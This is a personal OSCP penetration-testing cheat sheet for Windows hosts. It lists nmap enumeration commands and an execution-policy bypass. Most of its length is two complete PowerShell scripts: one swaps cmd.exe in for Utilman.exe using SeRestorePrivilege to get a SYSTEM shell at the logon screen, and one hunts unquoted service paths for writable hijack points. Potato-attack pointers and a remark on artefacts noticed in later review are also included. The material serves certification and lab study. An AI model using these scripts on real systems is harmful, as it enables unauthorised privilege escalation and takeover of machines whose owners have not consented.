OSCP Checklist
This is just a cheat sheet of sorts for myself.
Enumeration
sudo nmap $target
sudo nmap -sV -sC -p- $target (all ports, service versions and default scripts)
sudo nmap --script vuln -p $ports $target to check the open services for known vulnerabilities ($ports is the comma-separated list of open ports found above; --script vuln needs a port list to be useful)
Check HTML comments, especially on login or registration pages.
Windows machine:
powershell -ep bypass (bypasses the execution policy for this session so scripts run)
Windows
sudo nmap -Pn --script vuln vault.offsec (-Pn skips host discovery; Windows hosts usually drop the ping probes, so without it nmap reports the host as down)
Post Exploit
Windows
whoami /priv
If SeRestorePrivilege is listed:
Run EnableSeRestorePrivilege.ps1 to enable the privilege in the current PowerShell session (it normally shows as Disabled until then). With it enabled, the session can write to C:\Windows\System32 regardless of the ACLs on it.
If you also have RDP access, that write access to C:\Windows\System32 is enough for the utilman exploit: swap Utilman.exe for cmd.exe, then press Win+U (Ease of Access) on the logon screen to get a SYSTEM shell.
Check the Windows privilege escalation page.
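The SeRestorePrivilege branch above, put together as an added PowerShell example (this is not code from the original checklist). It assumes EnableSeRestorePrivilege.ps1 has already been run in the same session, that %TEMP% is on the same volume as System32 so the final move is a rename, and uses Utilman.old as the backup name (my choice).

```powershell
# Added example, not from the original checklist. Assumes whoami /priv listed
# SeRestorePrivilege and EnableSeRestorePrivilege.ps1 has already been run in
# this PowerShell session. Backup name and staging path are assumptions.

$sys32   = Join-Path $env:SystemRoot 'System32'
$utilman = Join-Path $sys32 'Utilman.exe'
$backup  = Join-Path $sys32 'Utilman.old'      # assumed backup name
$staged  = Join-Path $env:TEMP 'cmd.exe'       # assumed staging copy (same volume)

# 1. The privilege must be present *and* enabled in this token; whoami /priv
#    prints Enabled/Disabled in its State column.
$line = (whoami /priv) | Select-String 'SeRestorePrivilege'
if (-not $line) { throw 'SeRestorePrivilege not held: use another vector' }
if ($line.Line -notmatch 'Enabled') {
    throw 'SeRestorePrivilege is Disabled: run EnableSeRestorePrivilege.ps1 first'
}

# 2. Move the real Utilman.exe aside so the host can be restored afterwards.
#    Renaming inside System32 is exactly what SeRestorePrivilege grants;
#    without it the TrustedInstaller-owned ACL denies the rename.
if (-not (Test-Path $backup)) {
    Move-Item -Path $utilman -Destination $backup -ErrorAction Stop
}

# 3. Stage a copy of cmd.exe (readable by everyone, so no privilege needed)
#    and rename it into place. Same volume => Move-Item is a rename, the same
#    operation as step 2, not a fresh file creation under System32.
Copy-Item -Path (Join-Path $sys32 'cmd.exe') -Destination $staged -Force
Move-Item -Path $staged -Destination $utilman -ErrorAction Stop
Get-Item $utilman | Format-List FullName, Length, LastWriteTime

# 4. Lock the session (rundll32 user32.dll,LockWorkStation) or reconnect over
#    RDP, then press Win+U or click Ease of Access on the logon screen: the
#    "Utilman.exe" launched there is cmd.exe, running as SYSTEM.
#
# Cleanup when finished:  Move-Item $backup $utilman -Force
```

The Length check in step 3 is the quick sanity test: the file now sitting at Utilman.exe should be the size of cmd.exe, not of the original Utilman.exe. Put the original back before leaving the box; a System32 binary replaced by cmd.exe is an obvious artefact on any later review.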
Check Existing Privileges
whoami /priv
If SeImpersonatePrivilege is listed, try JuicyPotato (older builds; it fails on Windows 10 1809+ / Server 2019) or RoguePotato (works on newer builds, but needs an attacker-side redirector on port 135 that forwards back to the target's listener).
Check Unquoted Service Paths
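Added PowerShell example for the unquoted service path check (not from the original page; the function names are mine): it lists services whose binary path is unquoted and contains a space, then probes every directory the service control manager would search along that path for write access, which is the part the one-line check usually skips.

```powershell
# Added example, not from the original checklist. Function names are mine.

function Get-UnquotedServicePath {
    # Services whose ImagePath is unquoted, contains a space, and is not
    # under %SystemRoot% (those are almost never the interesting ones).
    Get-CimInstance Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.PathName -notmatch '^"' -and
            $_.PathName -match ' ' -and
            $_.PathName -notmatch '^[A-Za-z]:\\Windows\\'
        } |
        ForEach-Object {
            [PSCustomObject]@{
                Name      = $_.Name
                StartMode = $_.StartMode
                RunAs     = $_.StartName
                # Drop service arguments: keep the text up to the first ".exe".
                Path      = ($_.PathName -replace '(?i)^(.*?\.exe).*$', '$1')
            }
        }
}

function Test-WritableDirectory([string]$Dir) {
    # Direct probe instead of parsing icacls: try to create and delete a file.
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try {
        New-Item -Path $probe -ItemType File -ErrorAction Stop | Out-Null
        Remove-Item -Path $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch { return $false }
}

function Get-ServicePathHijackPoint {
    # For C:\Program Files\Some App\svc.exe the service control manager tries
    # C:\Program.exe, then C:\Program Files\Some.exe, then the real binary.
    # Report each candidate whose parent directory the current user can write.
    param([Parameter(Mandatory, ValueFromPipeline)] $Service)
    process {
        $parts = $Service.Path -split ' '
        for ($i = 1; $i -le $parts.Count; $i++) {
            $candidate = $parts[0..($i - 1)] -join ' '
            if ($i -lt $parts.Count) { $candidate += '.exe' }
            $dir = Split-Path -Path $candidate -Parent
            if (-not $dir -or -not (Test-Path -Path $dir)) { continue }
            if (Test-WritableDirectory $dir) {
                [PSCustomObject]@{
                    Service   = $Service.Name
                    RunAs     = $Service.RunAs
                    StartMode = $Service.StartMode
                    DropHere  = $candidate     # path a planted binary must have
                }
            }
        }
    }
}

Get-UnquotedServicePath | Get-ServicePathHijackPoint | Format-Table -AutoSize
```

A hit only matters if the service runs as a privileged account (RunAs LocalSystem or similar) and you can get it restarted: StartMode Auto plus a reboot, or Start-Service / sc start if the service DACL lets you. The last candidate for each service is the real binary's own directory; writing there means replacing the service executable outright rather than shadowing it.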